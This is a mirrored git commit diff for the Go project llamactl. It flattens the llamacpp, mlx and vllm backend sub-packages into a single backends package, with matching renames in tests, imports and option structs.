Mirror of https://github.com/lordmathis/llamactl.git

Flatten backends package structure
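
In short: the llamacpp, mlx, and vllm sub-packages are merged into the single backends package, so callers import one package and drop the per-backend prefixes. A minimal sketch of the caller-side effect (the wrapper function below is illustrative, not part of the commit):

package example

import "llamactl/pkg/backends"

// Before this commit: import "llamactl/pkg/backends/llamacpp" and call
// llamacpp.ParseLlamaCommand / use llamacpp.LlamaServerOptions.
// After the flattening, the same identifiers live directly in the backends package.
func parseLlama(cmd string) (*backends.LlamaServerOptions, error) {
    return backends.ParseLlamaCommand(cmd)
}
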
@@ -8,3 +8,15 @@ const (
 	BackendTypeVllm BackendType = "vllm"
 	// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
 )
+
+type Options struct {
+	BackendType    BackendType    `json:"backend_type"`
+	BackendOptions map[string]any `json:"backend_options,omitempty"`
+
+	Nodes map[string]struct{} `json:"-"`
+
+	// Backend-specific options
+	LlamaServerOptions *LlamaServerOptions `json:"-"`
+	MlxServerOptions   *MlxServerOptions   `json:"-"`
+	VllmServerOptions  *VllmServerOptions  `json:"-"`
+}
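
The relocated Options struct serializes only backend_type and the free-form backend_options map; Nodes and the typed per-backend option structs are tagged json:"-" and stay internal. A minimal construction sketch (the map keys are illustrative, not confirmed field names):

package example

import "llamactl/pkg/backends"

func exampleOptions() backends.Options {
    return backends.Options{
        BackendType: backends.BackendTypeVllm,
        BackendOptions: map[string]any{
            // Illustrative keys only; the real option names are defined
            // by the corresponding *ServerOptions struct tags.
            "model": "microsoft/DialoGPT-medium",
            "port":  8080,
        },
    }
}
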
@@ -1,15 +1,14 @@
-package llamacpp
+package backends

 import (
 	"encoding/json"
-	"llamactl/pkg/backends"
 	"reflect"
 	"strconv"
 )

-// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
+// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
 // Used for both parsing (with underscores) and building (with dashes)
-var multiValuedFlags = map[string]bool{
+var llamaMultiValuedFlags = map[string]bool{
 	// Parsing keys (with underscores)
 	"override_tensor": true,
 	"override_kv":     true,
@@ -338,8 +337,8 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
 // BuildCommandArgs converts InstanceOptions to command line arguments
 func (o *LlamaServerOptions) BuildCommandArgs() []string {
 	// Llama uses multiple flags for arrays by default (not comma-separated)
-	// Use package-level multiValuedFlags variable
-	return backends.BuildCommandArgs(o, multiValuedFlags)
+	// Use package-level llamaMultiValuedFlags variable
+	return BuildCommandArgs(o, llamaMultiValuedFlags)
 }

 func (o *LlamaServerOptions) BuildDockerArgs() []string {
@@ -356,10 +355,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
 func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
 	executableNames := []string{"llama-server"}
 	var subcommandNames []string // Llama has no subcommands
-	// Use package-level multiValuedFlags variable
+	// Use package-level llamaMultiValuedFlags variable

 	var llamaOptions LlamaServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
+	if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
 		return nil, err
 	}

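
The renamed llamaMultiValuedFlags map keeps the old behaviour: flags listed there may be repeated on the command line and are emitted once per element when building arguments rather than comma-joined. A small round-trip sketch using functions shown in this diff (error handling trimmed):

package example

import (
    "fmt"

    "llamactl/pkg/backends"
)

func demoRepeatedFlags() error {
    // Repeated --lora flags parse into a single []string field.
    opts, err := backends.ParseLlamaCommand(
        "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin")
    if err != nil {
        return err
    }
    // Building args goes the other way: one --lora flag per element.
    fmt.Println(opts.BuildCommandArgs())
    return nil
}
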
@@ -1,16 +1,16 @@
-package llamacpp_test
+package backends_test

 import (
 	"encoding/json"
 	"fmt"
-	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/backends"
 	"reflect"
 	"slices"
 	"testing"
 )

-func TestBuildCommandArgs_BasicFields(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+func TestLlamaCppBuildCommandArgs_BasicFields(t *testing.T) {
+	options := backends.LlamaServerOptions{
 		Model: "/path/to/model.gguf",
 		Port:  8080,
 		Host:  "localhost",
@@ -42,30 +42,30 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_BooleanFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
-		options  llamacpp.LlamaServerOptions
+		options  backends.LlamaServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "verbose true",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: true,
 			},
 			expected: []string{"--verbose"},
 		},
 		{
 			name: "verbose false",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: false,
 			},
 			excluded: []string{"--verbose"},
 		},
 		{
 			name: "multiple booleans",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose:   true,
 				FlashAttn: true,
 				Mlock:     false,
@@ -95,8 +95,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_NumericFields(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+func TestLlamaCppBuildCommandArgs_NumericFields(t *testing.T) {
+	options := backends.LlamaServerOptions{
 		Port:    8080,
 		Threads: 4,
 		CtxSize: 2048,
@@ -125,8 +125,8 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_ZeroValues(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
+	options := backends.LlamaServerOptions{
 		Port:        0, // Should be excluded
 		Threads:     0, // Should be excluded
 		Temperature: 0, // Should be excluded
@@ -152,8 +152,8 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_ArrayFields(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
+	options := backends.LlamaServerOptions{
 		Lora:               []string{"adapter1.bin", "adapter2.bin"},
 		OverrideTensor:     []string{"tensor1", "tensor2", "tensor3"},
 		DrySequenceBreaker: []string{".", "!", "?"},
@@ -177,8 +177,8 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
+	options := backends.LlamaServerOptions{
 		Lora:           []string{}, // Empty array should not generate args
 		OverrideTensor: []string{}, // Empty array should not generate args
 	}
@@ -193,9 +193,9 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_FieldNameConversion(t *testing.T) {
 	// Test snake_case to kebab-case conversion
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		CtxSize:      4096,
 		GPULayers:    32,
 		ThreadsBatch: 2,
@@ -223,7 +223,7 @@ func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
 	}
 }

-func TestUnmarshalJSON_StandardFields(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
 	jsonData := `{
 		"model": "/path/to/model.gguf",
 		"port": 8080,
@@ -234,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 		"temp": 0.7
 	}`

-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +263,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	}
 }

-func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamacpp.LlamaServerOptions) error
+		checkFn  func(backends.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -285,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
@@ -295,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
@@ -305,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -315,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -326,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamacpp.LlamaServerOptions
+			var options backends.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +339,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	}
 }

-func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`

-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
 	}
 }

-func TestUnmarshalJSON_ArrayFields(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
 	jsonData := `{
 		"lora": ["adapter1.bin", "adapter2.bin"],
 		"override_tensor": ["tensor1", "tensor2"],
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`

-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -423,7 +423,7 @@ func TestParseLlamaCommand(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result, err := llamacpp.ParseLlamaCommand(tt.command)
+			result, err := backends.ParseLlamaCommand(tt.command)

 			if tt.expectErr {
 				if err == nil {
@@ -446,7 +446,7 @@ func TestParseLlamaCommand(t *testing.T) {

 func TestParseLlamaCommandValues(t *testing.T) {
 	command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
-	result, err := llamacpp.ParseLlamaCommand(command)
+	result, err := backends.ParseLlamaCommand(command)

 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -475,7 +475,7 @@ func TestParseLlamaCommandValues(t *testing.T) {

 func TestParseLlamaCommandArrays(t *testing.T) {
 	command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
-	result, err := llamacpp.ParseLlamaCommand(command)
+	result, err := backends.ParseLlamaCommand(command)

 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -1,8 +1,4 @@
-package mlx
+package backends

-import (
-	"llamactl/pkg/backends"
-)
-
 type MlxServerOptions struct {
 	// Basic connection options
@@ -33,7 +29,7 @@ type MlxServerOptions struct {
 // BuildCommandArgs converts to command line arguments
 func (o *MlxServerOptions) BuildCommandArgs() []string {
 	multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
-	return backends.BuildCommandArgs(o, multipleFlags)
+	return BuildCommandArgs(o, multipleFlags)
 }

 // ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
@@ -48,7 +44,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) {
 	multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags

 	var mlxOptions MlxServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
+	if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
 		return nil, err
 	}

@@ -1,7 +1,7 @@
-package mlx_test
+package backends_test

 import (
-	"llamactl/pkg/backends/mlx"
+	"llamactl/pkg/backends"
 	"testing"
 )

@@ -50,7 +50,7 @@ func TestParseMlxCommand(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result, err := mlx.ParseMlxCommand(tt.command)
+			result, err := backends.ParseMlxCommand(tt.command)

 			if tt.expectErr {
 				if err == nil {
@@ -73,7 +73,7 @@ func TestParseMlxCommand(t *testing.T) {

 func TestParseMlxCommandValues(t *testing.T) {
 	command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
-	result, err := mlx.ParseMlxCommand(command)
+	result, err := backends.ParseMlxCommand(command)

 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -100,8 +100,8 @@ func TestParseMlxCommandValues(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs(t *testing.T) {
-	options := &mlx.MlxServerOptions{
+func TestMlxBuildCommandArgs(t *testing.T) {
+	options := &backends.MlxServerOptions{
 		Model: "/test/model.mlx",
 		Host:  "127.0.0.1",
 		Port:  8080,
@@ -1,11 +1,7 @@
-package vllm
+package backends

-import (
-	"llamactl/pkg/backends"
-)
-
-// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
-var multiValuedFlags = map[string]bool{
+// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
+var vllmMultiValuedFlags = map[string]bool{
 	"api-key":         true,
 	"allowed-origins": true,
 	"allowed-methods": true,
@@ -155,7 +151,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {

 	// Use package-level multipleFlags variable

-	flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
+	flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
 	args = append(args, flagArgs...)

 	return args
@@ -165,7 +161,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
 	var args []string

 	// Use package-level multipleFlags variable
-	flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
+	flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
 	args = append(args, flagArgs...)

 	return args
@@ -192,7 +188,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) {
 	}

 	var vllmOptions VllmServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
+	if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
 		return nil, err
 	}

@@ -1,8 +1,7 @@
-package vllm_test
+package backends_test

 import (
-	"llamactl/pkg/backends/vllm"
-	"slices"
+	"llamactl/pkg/backends"
 	"testing"
 )

@@ -46,7 +45,7 @@ func TestParseVllmCommand(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result, err := vllm.ParseVllmCommand(tt.command)
+			result, err := backends.ParseVllmCommand(tt.command)

 			if tt.expectErr {
 				if err == nil {
@@ -69,7 +68,7 @@ func TestParseVllmCommand(t *testing.T) {

 func TestParseVllmCommandValues(t *testing.T) {
 	command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
-	result, err := vllm.ParseVllmCommand(command)
+	result, err := backends.ParseVllmCommand(command)

 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -89,8 +88,8 @@ func TestParseVllmCommandValues(t *testing.T) {
 	}
 }

-func TestBuildCommandArgs(t *testing.T) {
-	options := vllm.VllmServerOptions{
+func TestVllmBuildCommandArgs(t *testing.T) {
+	options := backends.VllmServerOptions{
 		Model: "microsoft/DialoGPT-medium",
 		Port:  8080,
 		Host:  "localhost",
@@ -137,17 +136,3 @@ func TestBuildCommandArgs(t *testing.T) {
 		t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
 	}
 }
-
-// Helper functions
-func contains(slice []string, item string) bool {
-	return slices.Contains(slice, item)
-}
-
-func containsFlagWithValue(args []string, flag, value string) bool {
-	for i, arg := range args {
-		if arg == flag && i+1 < len(args) && args[i+1] == value {
-			return true
-		}
-	}
-	return false
-}
@@ -3,7 +3,6 @@ package instance_test
 import (
 	"encoding/json"
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
@@ -36,7 +35,7 @@ func TestNewInstance(t *testing.T) {

 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -108,7 +107,7 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
 		MaxRestarts:  &maxRestarts,
 		RestartDelay: &restartDelay,
 		BackendType:  backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -156,7 +155,7 @@ func TestSetOptions(t *testing.T) {

 	initialOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -170,7 +169,7 @@ func TestSetOptions(t *testing.T) {
 	// Update options
 	newOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
@@ -211,7 +210,7 @@ func TestSetOptions_PreservesNodes(t *testing.T) {
 	initialOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
 		Nodes:       map[string]struct{}{"worker1": {}},
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -224,7 +223,7 @@ func TestSetOptions_PreservesNodes(t *testing.T) {
 	updatedOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
 		Nodes:       map[string]struct{}{"worker2": {}}, // Attempt to change node
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
@@ -266,7 +265,7 @@ func TestGetProxy(t *testing.T) {

 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Host: "localhost",
 			Port: 8080,
 		},
@@ -321,7 +320,7 @@ func TestMarshalJSON(t *testing.T) {

 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -491,7 +490,7 @@ func TestCreateOptionsValidation(t *testing.T) {
 				MaxRestarts:  tt.maxRestarts,
 				RestartDelay: tt.restartDelay,
 				BackendType:  backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
@@ -524,7 +523,7 @@ func TestStatusChangeCallback(t *testing.T) {
 	globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -590,7 +589,7 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
 			options := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				Nodes:       tt.initialNodes,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
@@ -601,7 +600,7 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
 			updateOptions := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				Nodes:       tt.updateNodes,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/new-model.gguf",
 				},
 			}
@@ -634,7 +633,7 @@ func TestProcessErrorCases(t *testing.T) {
 	globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -665,7 +664,7 @@ func TestRemoteInstanceOperations(t *testing.T) {
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
 		Nodes:       map[string]struct{}{"remote-node": {}}, // Remote instance
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -709,7 +708,7 @@ func TestProxyClearOnOptionsChange(t *testing.T) {
 	globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Host: "localhost",
 			Port: 8080,
 		},
@@ -726,7 +725,7 @@ func TestProxyClearOnOptionsChange(t *testing.T) {
 	// Update options (should clear proxy)
 	newOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Host: "localhost",
 			Port: 8081, // Different port
 		},
@@ -756,7 +755,7 @@ func TestIdleTimeout(t *testing.T) {
 		inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			IdleTimeout: &timeout,
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		}, "main", nil)
@@ -770,7 +769,7 @@ func TestIdleTimeout(t *testing.T) {
 		inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			IdleTimeout: nil, // No timeout
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		}, "main", nil)
@@ -786,7 +785,7 @@ func TestIdleTimeout(t *testing.T) {
 		inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			IdleTimeout: &timeout,
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		}, "main", nil)
@@ -4,9 +4,6 @@ import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
-	"llamactl/pkg/backends/mlx"
-	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/config"
 	"log"
 	"maps"
@@ -33,9 +30,9 @@ type Options struct {
 	Nodes map[string]struct{} `json:"-"`

 	// Backend-specific options
-	LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
-	MlxServerOptions   *mlx.MlxServerOptions        `json:"-"`
-	VllmServerOptions  *vllm.VllmServerOptions      `json:"-"`
+	LlamaServerOptions *backends.LlamaServerOptions `json:"-"`
+	MlxServerOptions   *backends.MlxServerOptions   `json:"-"`
+	VllmServerOptions  *backends.VllmServerOptions  `json:"-"`
 }

 // options wraps Options with thread-safe access (unexported).
@@ -116,7 +113,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
 			return fmt.Errorf("failed to marshal backend options: %w", err)
 		}

-		c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
+		c.LlamaServerOptions = &backends.LlamaServerOptions{}
 		if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
 			return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
 		}
@@ -128,7 +125,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
 			return fmt.Errorf("failed to marshal backend options: %w", err)
 		}

-		c.MlxServerOptions = &mlx.MlxServerOptions{}
+		c.MlxServerOptions = &backends.MlxServerOptions{}
 		if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
 			return fmt.Errorf("failed to unmarshal MLX options: %w", err)
 		}
@@ -140,7 +137,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
 			return fmt.Errorf("failed to marshal backend options: %w", err)
 		}

-		c.VllmServerOptions = &vllm.VllmServerOptions{}
+		c.VllmServerOptions = &backends.VllmServerOptions{}
 		if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
 			return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
 		}
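
The three hunks above are the per-backend arms of Options.UnmarshalJSON: the generic backend_options payload is re-marshalled and decoded into the matching typed struct, now taken from the flattened backends package. A standalone sketch of that dispatch (the helper name and signature are hypothetical; only the per-case bodies mirror the diff):

package example

import (
    "encoding/json"
    "fmt"

    "llamactl/pkg/backends"
)

func decodeBackendOptions(t backends.BackendType, optionsData []byte) (any, error) {
    switch t {
    case backends.BackendTypeLlamaCpp:
        o := &backends.LlamaServerOptions{}
        if err := json.Unmarshal(optionsData, o); err != nil {
            return nil, fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
        }
        return o, nil
    case backends.BackendTypeVllm:
        o := &backends.VllmServerOptions{}
        if err := json.Unmarshal(optionsData, o); err != nil {
            return nil, fmt.Errorf("failed to unmarshal vLLM options: %w", err)
        }
        return o, nil
    default:
        return nil, fmt.Errorf("unsupported backend type: %s", t)
    }
}
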
@@ -3,7 +3,6 @@ package manager_test
 import (
 	"fmt"
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
@@ -72,7 +71,7 @@ func TestPersistence(t *testing.T) {
 		manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main")
 		options := &instance.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
@@ -134,7 +133,7 @@ func TestConcurrentAccess(t *testing.T) {
 			defer wg.Done()
 			options := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
@@ -171,7 +170,7 @@ func TestShutdown(t *testing.T) {
 	// Create test instance
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -233,7 +232,7 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) {
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
 		AutoRestart: &autoRestart,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -2,7 +2,6 @@ package manager_test

 import (
 	"llamactl/pkg/backends"
